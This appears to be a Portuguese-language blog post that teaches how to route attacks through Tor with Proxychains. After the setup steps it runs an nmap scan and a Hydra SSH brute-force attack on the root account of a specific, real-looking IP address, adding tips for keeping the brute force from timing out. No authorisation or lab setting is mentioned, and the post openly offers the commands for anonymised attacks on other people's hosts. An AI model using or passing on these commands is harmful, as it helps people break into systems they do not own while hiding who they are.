᥀đŸ”„REALIZANDO ATAQUES E VARREDURAS COM TOR E PROXYCHAINS᥀đŸ”„



O Proxychains Ă© um pacote que permite fazer o roteamento das requisiçÔes das suas aplicaçÔes atravĂ©s de proxys escolhidos por vocĂȘ e colocado em uma lista. Mas nesse caso iremos fazer uma adaptação que vai unir o Ăștil ao extremamente agradĂĄvel. Ao invĂ©s do Proxychains realizar o roteamento para uma lista especĂ­fica de proxys, iremos instalar o Tor Router e redirecionar as requisiçÔes diretamente para a porta do Tor. Ou seja, iremos realizar varreduras diretamente pela Tor.



Como ambiente escolhi utilizar o Kali Linux, mas caso vocĂȘ necessite utilizar em outra distribuição, basta instalar os pacotes:







Debian/Ubuntu:




# sudo apt-get install tor



# sudo apt-get install proxychains



CentOS/RHEL7:




# sudo yum install tor



# sudo yum install proxychains



Instalando e configurando o Tor




# sudo apt-get install tor






Agora vamos editar o arquivo de configuraçÔes do Proxychains nativo do Kali




# nano /etc/proxychains.conf



Comente a linha "strict_chain" e descomente a linha "dynamic_chain".




Ficando assim:







E agora no final deste mesmo arquivo, vamos adicionar:





socks5 127.0.0.1 9050





Ficando assim:








Inicializando o serviço da Tor




# service tor start



# tor




Veja se o serviço esta realmente rodando:





# service tor status








Testando a conexĂŁo





Use comando:




# proxychains firefox





e acesse meuip.com.br para ver seu IP de proxy.







Agora acesse o utrace e coloque o IP do seu Proxy para saber a localização do servidor que vocĂȘ estĂĄ utilizando como Gateway em en.utrace.de







Agora vocĂȘ esta redirecionado para um gateway em outro lugar.




Agora quando for realizar alguma varredura Ă© sĂł executar o comando com o proxychains na frente



Realizando uma varredura via Proxychains



# proxychains nmap -sC -sS 177.126.175.230





Para executar o reload no tor basta 




# service tor restart





Verificando o gateway atual




# curl ifconfig.me




No caso do NMAP, busque sempre varrer pelo IP, pois às vezes, dependendo da localização do seu proxy, a resolução dos nomes pode far timeout ou crashear o scan.





Realizando ataques de força bruta via Tor




Vamos executar um exemplo simples de ataque de brute force usando o Hydra e uma passlist





# proxychains hydra -l root -P passlist.txt 177.126.175.230 ssh




No caso Ă© recomendado o uso de passlists curtas para evitar que os erros de timeout comprometam o ataque.



Postar um comentĂĄrio

Post a Comment (0)

Postagem Anterior PrĂłxima Postagem